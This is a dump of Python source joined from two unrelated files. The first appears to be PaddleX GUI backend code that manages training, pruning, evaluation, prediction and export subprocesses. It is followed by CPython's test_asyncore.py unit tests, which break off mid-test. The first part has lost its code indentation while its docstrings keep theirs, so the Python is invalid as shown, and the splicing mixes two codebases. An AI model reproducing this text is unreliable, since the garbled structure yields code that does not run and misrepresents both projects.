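    """Return the status of a training task, downgrading it to XTRAINFAIL when
    the recorded training process no longer exists or has become a zombie.
    """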
status, message = get_folder_status(task_path, True)
task_id = os.path.split(task_path)[-1]
err_log = os.path.join(task_path, 'err.log')
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XTRAINFAIL
message = "训练任务{}异常终止,请查阅错误日志具体确认原因{}。\n\n 如若通过日志无法确定原因,可尝试以下几种方法,\n" \
"1. 尝试重新启动训练,看是否能正常训练; \n" \
"2. 调低batch_size(需同时按比例调低学习率等参数)排除是否是显存或内存不足的原因导致;\n" \
"3. 前往GitHub提ISSUE,描述清楚问题会有工程师及时回复: https://github.com/PaddlePaddle/PaddleX/issues ; \n" \
"3. 加QQ群1045148026或邮件至paddlex@baidu.com在线咨询工程师".format(task_id, err_log)
set_folder_status(task_path, status, message)
return status, message
def train_model(task_path):
"""训练模型
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
sensitivities_path = params['train'].sensitivities_path
p = mp.Process(target=_call_paddlex_train, args=(task_path, params))
p.start()
if sensitivities_path is None:
set_folder_status(task_path, TaskStatus.XTRAINING, p.pid)
else:
set_folder_status(task_path, TaskStatus.XPRUNETRAIN, p.pid)
return p
def stop_train_model(task_path):
"""停止正在训练的模型
Args:
task_path(str): 从task_path下的'XTRANING'文件中获取训练的进程id
"""
status, message = get_task_status(task_path)
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
pkill(pid)
best_model_saved = True
if not osp.exists(osp.join(task_path, 'output', 'best_model')):
best_model_saved = False
set_folder_status(task_path, TaskStatus.XTRAINEXIT, best_model_saved)
else:
raise Exception("模型训练任务没在运行中")
def prune_analysis_model(task_path):
"""模型裁剪分析
Args:
task_path(str): 模型训练的参数保存在task_path
dataset_path(str) 模型裁剪中评估数据集的路径
"""
best_model_path = osp.join(task_path, 'output', 'best_model')
assert osp.exists(best_model_path), "该任务暂未保存模型,无法进行模型裁剪分析"
prune_analysis_path = osp.join(task_path, 'prune')
if not osp.exists(prune_analysis_path):
os.makedirs(prune_analysis_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
assert params['train'].model.lower() not in [
"ppyolo", "fasterrcnn", "maskrcnn", "fastscnn", "HRNet_W18"
], "暂不支持PPYOLO、FasterRCNN、MaskRCNN、HRNet_W18、FastSCNN模型裁剪"
p = mp.Process(
target=_call_paddle_prune,
args=(best_model_path, prune_analysis_path, params))
p.start()
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEING, p.pid)
set_folder_status(task_path, TaskStatus.XPRUNEING, p.pid)
return p
def get_prune_status(prune_path):
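    """Return the status of a pruning analysis task, downgrading it to
    XSPRUNEFAIL when the recorded pruning process no longer exists or has
    become a zombie.
    """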
status, message = get_folder_status(prune_path, True)
if status in [PruneStatus.XSPRUNEING]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PruneStatus.XSPRUNEFAIL
message = "模型裁剪异常终止,可能原因如下:\n1.暂不支持FasterRCNN、MaskRCNN模型的模型裁剪\n2.模型裁剪过程中进程被异常结束,建议重新启动模型裁剪任务"
set_folder_status(prune_path, status, message)
return status, message
def stop_prune_analysis(prune_path):
"""停止正在裁剪分析的模型
Args:
prune_path(str): prune_path'XSSLMING'文件中获取训练的进程id
"""
status, message = get_prune_status(prune_path)
if status == PruneStatus.XSPRUNEING:
pid = int(message)
pkill(pid)
set_folder_status(prune_path, PruneStatus.XSPRUNEEXIT)
else:
raise Exception("模型裁剪分析任务未在运行中")
def evaluate_model(task_path,
task_type,
epoch=None,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
"""评估最优模型
Args:
task_path(str): 模型训练相关结果的保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,无法进行评估".format(output_path))
evaluate_status_path = osp.join(task_path, './logs/evaluate')
safe_clean_folder(evaluate_status_path)
if epoch is None:
model_path = osp.join(output_path, 'best_model')
else:
epoch_dir = "{}_{}".format('epoch', epoch)
model_path = osp.join(output_path, epoch_dir)
p = mp.Process(
target=_call_paddlex_evaluate_model,
args=(task_path, model_path, task_type, epoch, topk, score_thresh,
overlap_thresh))
p.start()
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATING, p.pid)
return p
def get_evaluate_status(task_path):
"""获取导出状态
Args:
task_path(str): 训练任务文件夹
"""
evaluate_status_path = osp.join(task_path, './logs/evaluate')
if not osp.exists(evaluate_status_path):
return None, "No evaluate fold in path {}".format(task_path)
status, message = get_folder_status(evaluate_status_path, True)
if status == TaskStatus.XEVALUATING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEVALUATEFAIL
message = "评估过程出现异常,请尝试重新评估!"
set_folder_status(evaluate_status_path, status, message)
if status not in [
TaskStatus.XEVALUATING, TaskStatus.XEVALUATED,
TaskStatus.XEVALUATEFAIL
]:
raise ValueError("Wrong status in evaluate task {}".format(status))
return status, message
def get_predict_status(task_path):
"""获取预测任务状态
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "./logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
if predict_num == 1:
total_num = 1
else:
total_num = int(
open(
osp.join(predict_status_path, "total_num"),
encoding='utf-8').readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def predict_test_pics(task_path,
img_list=[],
img_data=None,
save_dir=None,
score_thresh=0.5,
epoch=None):
"""模型预测
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
predict_status_path = osp.join(task_path, "./logs/predict")
safe_clean_folder(predict_status_path)
save_dir = osp.join(task_path, 'visualized_test_results')
safe_clean_folder(save_dir)
p = mp.Process(
target=_call_paddlex_predict,
args=(task_path, predict_status_path, params, img_list, img_data,
save_dir, score_thresh, epoch))
p.start()
set_folder_status(predict_status_path, PredictStatus.XPRESTART, p.pid)
return p, save_dir
def stop_predict_task(task_path):
"""停止预测任务
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "./logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
else:
pkill(pid)
status = PredictStatus.XPREFAIL
message = "图片预测进程已停止!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
total_num = int(
open(
osp.join(predict_status_path, "total_num"), encoding='utf-8')
.readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def get_export_status(task_path):
"""获取导出状态
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
导出的状态和其他消息.
"""
export_status_path = osp.join(task_path, './logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
# raise ValueError("获取到的导出状态异常,{}。".format(status))
return None, "获取到的导出状态异常,{}。".format(status)
return status, message
def export_quant_model(task_path, save_dir, epoch=None):
"""导出量化模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, './logs/export')
safe_clean_folder(export_status_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
p = mp.Process(
target=_call_paddlex_export_quant,
args=(task_path, params, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
def export_noquant_model(task_path, save_dir, epoch=None):
"""导出inference模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, './logs/export')
safe_clean_folder(export_status_path)
p = mp.Process(
target=_call_paddlex_export_infer,
args=(task_path, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
def opt_lite_model(model_path, save_dir=None, place='arm'):
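    """Run the Paddle-Lite optimization in a separate process and wait for it
    to finish.
    """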
p = mp.Process(
target=_call_paddlelite_export_lite,
args=(model_path, save_dir, place))
p.start()
p.join()
def stop_export_task(task_path):
"""停止导出
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
the export status and message.
"""
export_status_path = osp.join(task_path, './logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
else:
pkill(pid)
status = TaskStatus.XEXPORTFAIL
message = "已停止导出进程!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
raise ValueError("获取到的导出状态异常,{}。".format(status))
return status, message
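# ---------------------------------------------------------------------------
# Usage sketch: one assumed way the helpers above can be chained together by a
# front end. The task directory is a hypothetical placeholder; a real task
# directory must already contain the 'params.pkl' configuration file.
#
#     task_dir = '/path/to/workspace/tasks/T0001'      # hypothetical path
#     p = train_model(task_dir)                        # train in a subprocess
#     status, message = get_task_status(task_dir)      # poll while training
#     p.join()
#     evaluate_model(task_dir, task_type='classification')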
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import warnings
import errno
import struct
from test import support
from test.support import TESTFN, run_unittest, unlink, HOST, HOSTv6
from io import BytesIO
from io import StringIO
try:
import threading
except ImportError:
threading = None
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
unlink(addr)
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_issue_8594(self):
# XXX - this test is supposed to be removed in next major Python
# version
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
self.assertRaisesRegex(AttributeError, 'dispatcher instance',
getattr, d, 'foo')
# cheap inheritance with the underlying socket is supposed
# to still work but a DeprecationWarning is expected
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
family = d.family
self.assertEqual(family, socket.AF_INET)
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join()
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
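    """Shared checks for the dispatcher callback API; concrete test classes
    are expected to provide `family`, `addr` and `use_poll` attributes.
    """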
def tearDown(self):
asyncore.close_all()
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.family, self.family)
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
self.assertEqual(s.socket.type, socket.SOCK_STREAM | SOCK_NONBLOCK)
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
sock = socket.socket(self.family)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except socket.error:
            self.skipTest("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
finally:
sock.close()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
server = BaseServer(self.family, self.addr)
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=500))
t.start()
